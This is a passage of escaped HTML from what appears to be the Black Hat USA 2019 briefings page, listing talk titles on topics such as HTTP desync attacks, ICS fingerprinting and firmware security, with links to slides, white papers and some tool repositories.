&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Paquet-Clouston-Behind-The-Scenes-The-Industry-Of-Social-Media-Manipulation-Driven-By-Malware.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Attacking Electric Motors for Fun and Profit

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Jablonski-Attacking-Electric-Motors-For-Fun-And-Profit.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Jablonski-Attacking-Electric-Motors-For-Fun-And-Profit-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Sensor and Process Fingerprinting in Industrial Control Systems

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Ochoa-Sensor-And-Process-Fingerprinting-In-ICS.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;HTTP Desync Attacks: Smashing into the Cell Next Door

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Kettle-HTTP-Desync-Attacks-Smashing-Into-The-Cell-Next-Door.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Kettle-HTTP-Desync-Attacks-Smashing-Into-The-Cell-Next-Door-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/portswigger/desynchronize"&gt;Download Tool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Behind the Scenes of Intel Security and Manageability Engine

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Hasarfaty-Behind-The-Scenes-Of-Intel-Security-And-Manageability-Engine.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;All the 4G Modules Could be Hacked

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shupeng-All-The-4G-Modules-Could-Be-Hacked.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;New Vulnerabilities in 5G Networks

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shaik-New-Vulnerabilities-In-5G-Networks.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shaik-New-Vulnerabilities-In-5G-Networks-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;I’m Unique, Just Like You: Human Side-Channels and Their Implications for Security and Privacy

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Wixey-Im-Unique-Just-Like-You-Human-Side-Channels-And-Their-Implications-For-Security-And-Privacy.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;It’s Not What You Know, It’s What You Do: How Data Can Shape Security Engagement

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Sedova-Know-How-Data-Can-Shape-Security-Engagement.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Cyber Insurance 101 for CISO’s

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Smith-Cyber-Insurance-101-For-CISOs.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Path Less Traveled: Abusing Kubernetes Defaults&lt;/li&gt;
&lt;li&gt;Selling 0-Days to Governments and Offensive Security Companies

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shwartz-Selling-0-Days-To-Governments-And-Offensive-Security-Companies.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Selling 0-Days to Governments and Offensive Security Companies

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shwartz-Selling-0-Days-To-Governments-And-Offensive-Security-Companies.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Infiltrating Corporate Intranet Like NSA - Pre-auth RCE on Leading SSL VPNs

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Integration of Cyber Insurance Into A Risk Management Program&lt;/li&gt;
&lt;li&gt;Come Join the CAFSA - Continuous Automated Firmware Security Analysis

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Mulliner-Come-Join-The-CAFSA-Continuous-Automated-Firmware-Security-Analysis.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Mulliner-Come-Join-The-CAFSA-Continuous-Automated-Firmware-Security-Analysis-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Worm Charming: Harvesting Malware Lures for Fun and Profit

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Amini-Worm-Charming-Harvesting-Malware-Lures-For-Fun-And-Profit.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;MITRE ATT&amp;amp;CK: The Play at Home Edition

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Look, No Hands! – The Remote, Interaction-less Attack Surface of the iPhone

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Silvanovich-Look-No-Hands-The-Remote-Interactionless-Attack-Surface-Of-The-iPhone.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Chip.Fail - Glitching the Silicon of the Connected World&lt;/li&gt;
&lt;li&gt;Lessons From Two Years of Crypto Audits

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Aumasson-Lessons-From-Two-Years-Of-Crypto-Audits.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Responding to a Cyber Attack with Missiles

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Hypponen-Responding-To-A-Cyber-Attack-With-Missiles.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Finding a Needle in an Encrypted Haystack: Leveraging Cryptographic 
Abilities to Detect the Most Prevalent Attacks on Active Directory

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Simakov-Finding-A-Needle-In-An-Encrypted-Haystack-Leveraging-Cryptographic-Abilities-To-Detect-The-Most-Prevalent-Attacks-On-Active-Directory.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Controlled Chaos: The Inevitable Marriage of DevOps &amp;amp; Security

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Shortridge-Controlled-Chaos-The-Inevitable-Marriage-Of-DevOps-And-Security.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Arm IDA and Cross Check: Reversing the Boeing 787's Core Network

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Santamarta-Arm-IDA-And-Cross-Check-Reversing-The-787-Core-Network.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Cyber Shell Game – War, Information Warfare, and the Darkening Web&lt;/li&gt;
&lt;li&gt;He Said, She Said – Poisoned RDP Offense and Defense

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Baril-He-Said-She-Said-Poisoned-RDP-Offense-And-Defense.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Baril-He-Said-She-Said-Poisoned-RDP-Offense-And-Defense-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;How Do Cyber Insurers View The World?

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Prevost-How-Insurers-View-The-World.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Internet-Scale Analysis of AWS Cognito Security&lt;/li&gt;
&lt;li&gt;Messaging Layer Security: Towards a New Era of Secure Group Messaging

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Robert-Messaging-Layer-Security-Towards-A-New-Era-Of-Secure-Group-Messaging.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Hacking Your Non-Compete

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Stone-Hacking-Your-Non-Compete.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Stone-Hacking-Your-Non-Compete-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Hunting for Bugs, Catching Dragons

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Joly-Hunting-For-Bugs-Catching-Dragons.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Flying a False Flag: Advanced C2, Trust Conflicts, and Domain Takeover

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Landers-Flying-A-False-Flag-Advanced-C2-Trust-Conflicts-And-Domain-Takeover.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Going Beyond Coverage-Guided Fuzzing with Structured Fuzzing

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Metzman-Going-Beyond-Coverage-Guided-Fuzzing-With-Structured-Fuzzing.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Transparency in the Software Supply Chain: Making SBOM a Reality&lt;/li&gt;
&lt;li&gt;Deconstructing the Phishing Campaigns that Target Gmail Users&lt;/li&gt;
&lt;li&gt;Cybersecurity Risk Assessment for Safety-Critical Systems

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Vessels-Cybersecurity-Risk-Assessment-For-Safety-Critical-Systems.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;PeriScope: An Effective Probing and Fuzzing Framework for the Hardware-OS Boundary

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Song-PeriScope-An-Effective-Probing-and-Fuzzing-Framework-For-The-Hardware-OS-Boundary.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Defense Against Rapidly Morphing DDOS

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Tyagi-Defense-Against-Rapidly-Morphing-DDOS.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Reverse Engineering WhatsApp Encryption for Chat Manipulation and More

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Zaikin-Reverse-Engineering-WhatsApp-Encryption-For-Chat-Manipulation-And-More.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Detecting Malicious Files with YARA Rules as They Traverse the Network

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-Bernal-Detecting-Malicious-Files-With-YARA-Rules-As-They-Traverse-The-Network.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;MINimum Failure - Stealing Bitcoins with Electromagnetic Fault Injection

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Wednesday/us-19-OFlynn-MINimum-Failure-Stealing-Bitcoins-With-EMFI.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/newaetech/phywhispererusb"&gt;Download Tool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Mobile Interconnect Threats: How Next-Gen Products May be Already Outdated

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Teissier-Mobile-Interconnect-Threats-How-Next-Gen-Products-May-Be-Already-Outdated.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;On Trust: Stories from the Front Lines

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Farshchi-On-Trust-Stories-From-The-Front-Lines.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;WebAuthn 101 - Demystifying WebAuthn

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Brand-WebAuthn-101-Demystifying-WebAuthn.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Attack Surface as a Service

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Westelius-Attack-Surface-As-A-Service.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Woke Hiring Won’t Save Us: An Actionable Approach to Diversity Hiring and Retention

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Lynch-Woke-Hhiring-Wont-Save-Us-An-Actionable-Approach-To-Diversity-Hiring-And-Retention.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;GDPArrrrr: Using Privacy Laws to Steal Identities

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Pavur-GDPArrrrr-Using-Privacy-Laws-To-Steal-Identities.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Pavur-GDPArrrrr-Using-Privacy-Laws-To-Steal-Identities-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Future of Securing Intelligent Electronic Devices Using the IEC 62351-7 Standard for Monitoring

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Carcano-The-Future-Of-Securing-IED-Using-The-IEC62351-7-Standard-For-Monitoring.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Testing Your Organization's Social Media Awareness

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Wilkin-Testing-Your-Organizations-Social-Media-Awareness.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Death to the IOC: What's Next in Threat Intelligence

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Soman-Death-To-The-IOC-Whats-Next-In-Threat-Intelligence.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Planning a Bug Bounty: The Nuts and Bolts from Concept to Launch&lt;/li&gt;
&lt;li&gt;Playing Offense and Defense with Deepfakes

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Price-Playing-Offense-And-Defense-With-Deepfakes.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;All Your Apple are Belong to Us: Unique Identification and Cross-Device Tracking of Apple Devices

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Zheng-All-Your-Apple-Are-Belong-To-Us-Unique-Identification-And-Cross-Device-Tracking-Of-Apple-Devices.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Enemy Within: Modern Supply Chain Attacks

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Doerr-The-Enemy-Within-Modern-Supply-Chain-Attacks.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Information Security in the Public Interest&lt;/li&gt;
&lt;li&gt;Breaking Through Another Side: Bypassing Firmware Security Boundaries from Embedded Controller

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Matrosov-Breaking-Through-Another-Side-Bypassing-Firmware-Security-Boundaries-From-Embedded-Controller.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Project Zero: Five Years of 'Make 0Day Hard'

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Hawkes-Project-Zero-Five-Years-Of-Make-0day-Hard.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Rough and Ready: Frameworks to Measure Persistent Engagement and Deterrence

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Healey-Rough-and-Ready-Frameworks-To-Measure-Persistent-Engagment-and-Deterrence.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Healey-Rough-and-Ready-Frameworks-to-Measure-Persistent-Engagement-and-Deterrence-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;100 Seconds of Solitude: Defeating Cisco Trust Anchor With FPGA Bitstream Shenanigans&lt;/li&gt;
&lt;li&gt;Denial of Service with a Fistful of Packets: Exploiting Algorithmic Complexity Vulnerabilities

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Hauke-Denial-Of-Service-With-A-Fistful-Of-Packets-Exploiting-Algorithmic-Complexity-Vulnerabilities.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Women in Security: Building a Female InfoSec Community in Korea, Japan, and Taiwan

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Nakajima-Women-In-Security-Building-A-Female-InfoSec-Community-In-Korea-Japan-And-Taiwan.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Nakajima-Women-In-Security-Building-A-Female-InfoSec-Community-In-Korea-Japan-And-Taiwan-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Rogue7: Rogue Engineering-Station Attacks on S7 Simatic PLCs

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Bitan-Rogue7-Rogue-Engineering-Station-Attacks-On-S7-Simatic-PLCs.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Bitan-Rogue7-Rogue-Engineering-Station-Attacks-On-S7-Simatic-PLCs-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Operational Templates for State-Level Attack and Collective Defense of Countries

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Conti-Operational-Templates-for-State-Level-Attack-and-Collective-Defense-of-Countries.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Conti-Operational-Templates-for-State-Level-Attack-and-Collective-Defense-of-Countries-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Process Injection Techniques - Gotta Catch Them All

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Kotler-Process-Injection-Techniques-Gotta-Catch-Them-All-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SafeBreach-Labs/pinjectra"&gt;Download Tool&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Bounty Operations: Best Practices and Common Pitfalls to Avoid in the First 6-12 Months&lt;/li&gt;
&lt;li&gt;DevSecOps : What, Why and How

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Shrivastava-DevSecOps-What-Why-And-How.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Breaking Encrypted Databases: Generic Attacks on Range Queries&lt;/li&gt;
&lt;li&gt;Finding Our Path: How We're Trying to Improve Active Directory Security&lt;/li&gt;
&lt;li&gt;API-Induced SSRF: How Apple Pay Scattered Vulnerabilities Across the Web

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Maddux-API-Induced-SSRF-How-Apple-Pay-Scattered-Vulnerabilities-Across-The-Web.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Exploiting Qualcomm WLAN and Modem Over The Air

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Pi-Exploiting-Qualcomm-WLAN-And-Modem-Over-The-Air.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Pi-Exploiting-Qualcomm-WLAN-And-Modem-Over-The-Air-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Practical Approach to Automate the Discovery and Eradication of Open-Source Software Vulnerabilities at Scale

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Almubayed-Practical-Approach-To-Automate-The-Discovery-And-Eradication-Of-Open-Source-Software-Vulnerabilities-At-Scale.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Managing for Success: Maintaining a Healthy Bug Bounty Program Long Term&lt;/li&gt;
&lt;li&gt;Ghidra - Journey from Classified NSA Tool to Open Source&lt;/li&gt;
&lt;li&gt;Firmware Cartography: Charting the Course for Modern Server Compromise&lt;/li&gt;
&lt;li&gt;0-days &amp;amp; Mitigations: Roadways to Exploit and Secure Connected BMW Cars

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Cai-0-Days-And-Mitigations-Roadways-To-Exploit-And-Secure-Connected-BMW-Cars.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Cai-0-Days-And-Mitigations-Roadways-To-Exploit-And-Secure-Connected-BMW-Cars-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Infighting Among Russian Security Services in the Cyber Sphere

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Zenz-Infighting-Among-Russian-Security-Services-in-the-Cyber-Sphere.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Behind the scenes of iOS and Mac Security&lt;/li&gt;
&lt;li&gt;Zombie Ant Farming: Practical Tips for Playing Hide and Seek with Linux EDRs

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Snezhkov-Zombie-Ant-Farming-Practical-Tips-For-Playing-Hide-And-Seek-With-Linux-EDRs.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Predictive Vulnerability Scoring System

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Roytman-Jacobs-Predictive-Vulnerability-Scoring-System.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Roytman-Predictive-Vulnerability-Scoring-System-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Towards Discovering Remote Code Execution Vulnerabilities in Apple FaceTime

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Huang-Towards-Discovering-Remote-Code-Execution-Vulnerabilities-In-Apple-FaceTime.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Backdooring Hardware Devices by Injecting Malicious Payloads on Microcontrollers

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Berta-Backdooring-Hardware-Devices-By-Injecting-Malicious-Payloads-On-Microcontrollers.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
